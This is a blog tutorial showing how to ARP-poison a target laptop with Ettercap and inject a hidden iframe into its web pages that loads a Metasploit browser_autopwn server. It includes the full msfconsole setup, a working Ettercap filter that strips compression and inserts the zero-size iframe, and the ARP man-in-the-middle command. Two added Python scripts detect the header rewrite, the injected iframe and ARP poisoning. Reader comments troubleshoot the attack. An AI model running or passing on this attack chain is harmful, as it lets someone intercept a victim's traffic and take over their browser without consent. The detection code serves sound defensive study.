Ettercap Filters with Metasploit browser_autopwn

October 21st, 2010

Here is the scenario: you are working on a pen test, and the assigned “flag” is gaining access to a laptop belonging to someone on the organization’s security team. You get access to the internal network through some silly file inclusion or SQL injection vulnerability. You find your target box… but alas, it has a firewall in place. Not a single port is open. Do you hang your head in shame? No. There are still plenty of options. This quick tutorial will look at how to use Ettercap to get someone to open a page served by Metasploit’s browser_autopwn (without even knowing it).

We know that the target is a laptop, so we can assume that it will likely be used to browse the web. One common attack vector I have seen proposed is to spoof the DNS requests and redirect the user to a malicious web page. There are a few problems with this method. The laptop likely has a DNS cache of common sites. Even if we can get DNS redirection to work, it will be obvious to the user that something is not quite right when Google comes up as a blank page and starts trying to install scripts.

One of the very useful features of Ettercap is its filtering engine. What if we could write a filter that inserts a hidden <iframe> every time a page containing a <body> tag comes back to the victim? Good news: we can.

Before we get ahead of ourselves, we first need to create something to put in this iframe.

As a root user:

msfconsole (start up Metasploit)

msf> use auxiliary/server/browser_autopwn (select browser_autopwn)

msf> set LHOST [your ip here] (make sure the payloads know where to connect back)

msf> set SRVPORT 80 (set the server to listen on port 80)

msf> set URIPATH / (set the malicious page at the webroot)

msf> run

Now we have Metasploit’s browser_autopwn running. As soon as anyone connects to http://[attacker ip], Metasploit will attempt to exploit the user’s browser. Very cool indeed (at least for the attacker).

Next, we have to make the users open up our malicious page. This is where Ettercap comes in.

First, enable IP forwarding.

echo 1 > /proc/sys/net/ipv4/ip_forward

Now we need to create our Ettercap filter. The following script should hopefully be commented enough to make sense.

For more information about Ettercap filters take a look at:

man etterfilter

and

cat /usr/share/ettercap/etter.filter.examples

[START SCRIPT]

#------------------------Filter Example By Kno----------------------------
#|  Replace attacker ip (192.168.56.101) with correct address (4 times)  |
#-------------------------------------------------------------------------
#--Make sure we are working with plain text--
# If traffic is TCP, is not headed to our attacking server, and is going to
# port 80 or 8080 (HTTP)...  The port test is parenthesised: without the
# parentheses the || would apply on its own and match every packet to 8080,
# regardless of the checks before it.
if (ip.proto == TCP && ip.dst != '192.168.56.101' && (tcp.dst == 80 || tcp.dst == 8080)) {
   # ...and if it contains an Accept-Encoding header...
   if (search(DATA.data, "Accept-Encoding")) {
      # ...rename the header so the server answers with uncompressed (plain text) HTML
      replace("Accept-Encoding", "Accept-Nothing!");
   }
}

#--Inject iframe--
# Same idea for the responses coming back from port 80 or 8080
if (ip.proto == TCP && ip.dst != '192.168.56.101' && (tcp.src == 80 || tcp.src == 8080)) {
   if (search(DATA.data, "<body>")) {
      # Replace the body tag with the body tag plus an iframe pointing at our attacking web page
      replace("<body>", "<body><iframe src='http://192.168.56.101' width=0 height=0 />");
      msg("iframe injected after <body>\n");
   }
   # Older pages often use upper-case tags; search() is case sensitive, so check both
   if (search(DATA.data, "<BODY>")) {
      replace("<BODY>", "<BODY><IFRAME SRC='http://192.168.56.101' width=0 height=0 />");
      msg("iframe injected after <BODY>\n");
   }
}

[END SCRIPT]

It is worth noting that the replace “function” will not change the size of the DATA.data buffer. This means that if the text you are replacing is shorter than what you are replacing it with, some data will be cut off at the end of the buffer. In our filter example, a bit of information is going to get cut off from the end of the page because of the extra <iframe…> that is being added. Usually this means part of the page footer and the </body></html> will be lost. Hopefully it won’t make too much of a difference. In my testing, the filter only had problems with really short web pages.
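Each rewrite the filter performs leaves a trace on the wire that a defender can look for: a request header that has been renamed away from Accept-Encoding but still lists content-codings, a hidden iframe sitting directly behind the <body> tag, and an HTML page that ends before </html> because the buffer could not grow. The following Python is an added example written for this page, not code from the post or from Ettercap; it runs those three checks over a constructed request/response pair (the hostname, addresses and header values are made up):

```python
"""Spot the side effects an in-flight HTTP rewrite leaves behind.

Added example, not from the original post or the Ettercap project. It inspects
one captured HTTP request/response pair and reports three artefacts a filter
of the kind shown above produces:
  1. a request header whose value is nothing but content-codings (gzip,
     deflate, ...) under a name other than Accept-Encoding,
  2. a zero-sized or hidden <iframe> directly after the <body> tag,
  3. an HTML document that ends before </html> (fixed-size buffer rewrite).
The request, response and addresses below are constructed for the demo.
"""
import re
from typing import Dict, List, Optional, Tuple

CODINGS = {"gzip", "x-gzip", "deflate", "compress", "br", "identity", "*"}
# Headers that may legitimately carry coding tokens in a request.
CODING_HEADERS = {"accept-encoding", "content-encoding", "transfer-encoding", "te"}

BODY_IFRAME = re.compile(rb"<body[^>]*>\s*<iframe\b([^>]*)>", re.I)
HIDDEN_ATTR = re.compile(
    rb"""(?:width|height)\s*=\s*['"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)
SRC_ATTR = re.compile(rb"""src\s*=\s*['"]?([^'"\s>]+)""", re.I)


def parse_http(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into start line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def renamed_accept_encoding(headers: Dict[str, str]) -> List[str]:
    """Header names that carry only content-coding tokens but are not Accept-Encoding."""
    hits = []
    for name, value in headers.items():
        if name in CODING_HEADERS:
            continue
        tokens = {t.split(";")[0].strip().lower() for t in value.split(",")}
        if tokens <= CODINGS:  # every token is a coding: the header was renamed
            hits.append(name)
    return hits


def hidden_iframe_after_body(body: bytes) -> Optional[str]:
    """Return the src of a hidden iframe placed right after <body>, or None."""
    m = BODY_IFRAME.search(body)
    if not m or not HIDDEN_ATTR.search(m.group(1)):
        return None
    src = SRC_ATTR.search(m.group(1))
    return src.group(1).decode("iso-8859-1") if src else ""


def html_truncated(headers: Dict[str, str], body: bytes) -> bool:
    """True when an HTML body opens <html> but never closes it."""
    if "text/html" not in headers.get("content-type", "").lower():
        return False
    low = body.lower()
    return b"<html" in low and b"</html>" not in low


def inspect_exchange(request: bytes, response: bytes) -> List[str]:
    """Run all three checks over one request/response pair and return findings."""
    findings: List[str] = []
    _, req_headers, _ = parse_http(request)
    for name in renamed_accept_encoding(req_headers):
        findings.append(f"request header '{name}' holds content-codings: "
                        "Accept-Encoding was probably renamed in transit")
    _, resp_headers, body = parse_http(response)
    src = hidden_iframe_after_body(body)
    if src is not None:
        findings.append(f"hidden iframe injected directly after <body> (src={src or 'none'})")
    if html_truncated(resp_headers, body):
        findings.append("HTML body stops before </html>: consistent with a fixed-size rewrite")
    return findings


# Constructed capture: a request whose Accept-Encoding was renamed, and a
# response carrying a hidden iframe whose tail never reaches </html>.
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: text/html\r\n"
    b"Accept-Nothing!: gzip, deflate\r\n"
    b"Connection: keep-alive\r\n\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n\r\n"
    b"<html><head><title>Example</title></head>"
    b"<body><iframe src='http://192.168.56.101' width=0 height=0 />"
    b"<p>Hello</p><p>Footer te"
)
# The same exchange as an untouched browser and server would produce it.
CLEAN_REQUEST = SAMPLE_REQUEST.replace(b"Accept-Nothing!", b"Accept-Encoding")
CLEAN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n\r\n"
    b"<html><head><title>Example</title></head>"
    b"<body><p>Hello</p><p>Footer text</p></body></html>"
)

if __name__ == "__main__":
    for line in inspect_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE) or ["no findings"]:
        print(line)
```

The header check is deliberately generic: it does not look for the literal “Accept-Nothing!” string, which anyone can change, but for any request header whose value consists only of content-coding tokens under a name that should not carry them. On a proxy or IDS that sees plain-text HTTP, that pattern is a strong signal that something between client and server is editing headers in flight.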

Let’s compile our filter

etterfilter iframe.filter -o iframe.ef

Let’s start up Ettercap:

ettercap -T -i eth0 -q -F iframe.ef -M ARP /192.168.56.102/ //

-T is for text mode

-i eth0 specifies our interface

-q makes Ettercap run in quiet mode (not as much output to the screen)

-F iframe.ef selects our Ettercap filter we created and compiled earlier

-M ARP specifies the method we are going to use (in this case ARP spoofing)

Ettercap accepts targets by the following convention:

MAC ADDRESS(es)/IP ADDRESS(es)/PORT(s)

so /192.168.56.102/ // means that our first target is anything with an IP of 192.168.56.102 and our second target is anything and everything. We are basically telling 192.168.56.102 that the attacker PC is the router, and we are telling everyone else that the attacker PC is the victim’s laptop. This means that all the traffic to and from the victim’s laptop will have to go through us. (If this doesn’t make any sense, or if you are not familiar with ARP poisoning, you should Google it.)

If all is working properly, when our victim browses the web, any page they go to will contain an IFRAME with our malicious browser_autopwn page. If their browser is vulnerable, or they run the extra “plug-ins” needed – Game over. You win.

Please don’t use this information for any malicious purposes. My hope is that this post will make the reader aware of a security risk (and possibly help the reader use it for a pen test or lab experimentation- only after receiving appropriate permission, of course).  Good security practices, such as keeping current with updates, verifying plug-ins before running them, and implementing IDS measures (such as arpwatch) could help prevent an attack like this.
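The arpwatch-style check mentioned above can be sketched in a few lines. The Python below is an added example, not part of the original post or of arpwatch itself: it replays a constructed ARP trace (every MAC and IP address in it is made up) and alerts when an address changes owner, or when one MAC starts answering for several addresses, which is exactly what the two-target poisoning described earlier looks like to a sniffer on the same segment.

```python
"""Arpwatch-style detection of ARP cache poisoning.

Added example, not from the original post or from arpwatch. It replays a
constructed list of ARP packets, as a sniffer on the segment would see them,
and raises an alert when
  * an IP address that was bound to one MAC is suddenly announced by another
    MAC (a "flip flop" in arpwatch's terms), or
  * one MAC announces more than one IP address, which is what a host in the
    middle looks like when it answers for both the gateway and the victim.
All addresses below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class ArpPacket:
    ts: float        # capture time in seconds
    op: str          # "request" or "reply"
    sender_mac: str  # hardware address in the ARP payload
    sender_ip: str   # protocol address in the ARP payload


class ArpMonitor:
    """Learns IP-to-MAC bindings and flags changes, like arpwatch's database."""

    def __init__(self, max_ips_per_mac: int = 1):
        self.ip_to_mac: Dict[str, str] = {}
        self.mac_to_ips: Dict[str, Set[str]] = defaultdict(set)
        self.max_ips_per_mac = max_ips_per_mac

    def observe(self, pkt: ArpPacket) -> List[str]:
        """Record the sender binding and return the alerts raised by this packet."""
        alerts: List[str] = []
        # Requests and replies both carry the sender's binding, and a poisoner
        # forges exactly that field, so both opcodes are learned from.
        ip, mac = pkt.sender_ip, pkt.sender_mac.lower()
        known = self.ip_to_mac.get(ip)
        if known is None:
            self.ip_to_mac[ip] = mac
        elif known != mac:
            alerts.append(f"{pkt.ts:.1f}s flip flop: {ip} moved from {known} to {mac}")
            self.ip_to_mac[ip] = mac  # adopt the new binding, as arpwatch does
        if ip not in self.mac_to_ips[mac]:
            self.mac_to_ips[mac].add(ip)
            owned = self.mac_to_ips[mac]
            if len(owned) > self.max_ips_per_mac:
                alerts.append(f"{pkt.ts:.1f}s {mac} claims {len(owned)} addresses: "
                              + ", ".join(sorted(owned)))
        return alerts


def replay(packets: List[ArpPacket], max_ips_per_mac: int = 1) -> List[str]:
    """Feed a whole capture through a fresh monitor and collect every alert."""
    mon = ArpMonitor(max_ips_per_mac)
    out: List[str] = []
    for pkt in sorted(packets, key=lambda p: p.ts):
        out.extend(mon.observe(pkt))
    return out


GATEWAY_MAC = "02:00:00:00:00:01"
VICTIM_MAC = "02:00:00:00:00:02"
MITM_MAC = "02:00:00:00:00:03"

# Constructed trace: normal traffic first, then a third host announcing the
# gateway's address to the victim and the victim's address to everyone else.
SAMPLE_TRACE = [
    ArpPacket(0.0, "reply", GATEWAY_MAC, "192.168.56.1"),
    ArpPacket(0.5, "request", VICTIM_MAC, "192.168.56.102"),
    ArpPacket(1.0, "request", MITM_MAC, "192.168.56.101"),
    ArpPacket(10.0, "reply", MITM_MAC, "192.168.56.1"),
    ArpPacket(10.1, "reply", MITM_MAC, "192.168.56.102"),
]

if __name__ == "__main__":
    for alert in replay(SAMPLE_TRACE):
        print(alert)
```

Both signals have benign causes, so in practice they are tuned rather than acted on blindly: a DHCP lease moving to a new machine produces a single flip flop, and a router or cluster that owns several virtual addresses will exceed a limit of one IP per MAC, which is why `max_ips_per_mac` is a parameter. A binding that flips and then flips back within seconds, or a MAC that starts answering for the gateway address it never owned before, is the pattern worth paging on.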

Thanks to t3h3v1lh4x0r for noting an improperly quoted replace() function.  It is now fixed.

  1. t3h3v1lh4x0r says:

    BODY is not quoted correctly

  2. mekix says:

    Good! Is this like SET (Social Engineer Toolkit)? One of its options allows something similar. Thank you for your time and this beautiful paper.

  3. gabo says:

    Hey, I’ve tried a few filters, a simple img replacer and a few others. I put a msg(“Filter OK.\n”) in for when the filter works, but nothing happens. I do ARP poison the entire LAN with it, but nothing happens… I guess that any etterfilter works here. Any thoughts?

    All of the plug-ins work well. I’m on Arch Linux and kernel 3.2.6-1.

  4. 294v says:

    Great tutorial, but after I run this command

    ettercap -T -i at0 -q -F /root/iframe.ef -M ARP /10.0.0.1/ //

    it freezes all traffic. 10.0.0.1 can’t view any websites…

    Any ideas?

    • 294v says:

      Sorry, amendment: the IP of the target was incorrect, but I still have the same problem.

      This is the command I’m using:

      ettercap -T -i at0 -q -F /root/iframe.ef -M ARP /10.0.0.11/ //

      Cheers

  5. [...] Con el paso del tiempo me he dado cuenta de que este tipo de situación es bastante frecuente: es realmente difícil encontrar una empresa que tenga en cuenta políticas de configuración estrictas para asegurar un entorno local. Personalmente pienso que muchas organizaciones no son conscientes del daño que podría hacer un empleado descontento en un entorno local “poco controlado”. Sin llegar a utilizar herramientas sofisticadas como Loki o Yersinia, es posible desde tirar toda una red con apenas un par de paquetes y con ayuda de Scapy, hasta hacer MitM usando ARP / DHCP / VRRP / HSRP o hasta cosas mas entretenidas como conseguir un pool de shells sin mucho esfuerzo con el browser_autopwn de Metasploit y etterfilters. [...]

  6. [...] Con el paso del tiempo me he dado cuenta de que este tipo de situación es bastante frecuente: es realmente difícil encontrar una empresa que tenga en cuenta políticas de configuración estrictas para asegurar un entorno local. Personalmente pienso que muchas organizaciones no son conscientes del daño que podría hacer un empleado descontento en un entorno local “poco controlado”. Sin llegar a utilizar herramientas sofisticadas como Loki o Yersinia, es posible desde tirar toda una red con apenas un par de paquetes y con ayuda de Scapy, hasta hacer MitM usando ARP / DHCP / VRRP / HSRP o hasta cosas mas entretenidas como conseguir un pool de shells sin mucho esfuerzo con el browser_autopwn de Metasploit y etterfilters. [...]

  7. citsahcots says:

    Could you please tell me what language I should use to write an ettercap plugin?
    Or where can I find the API or information?
    Please email me?
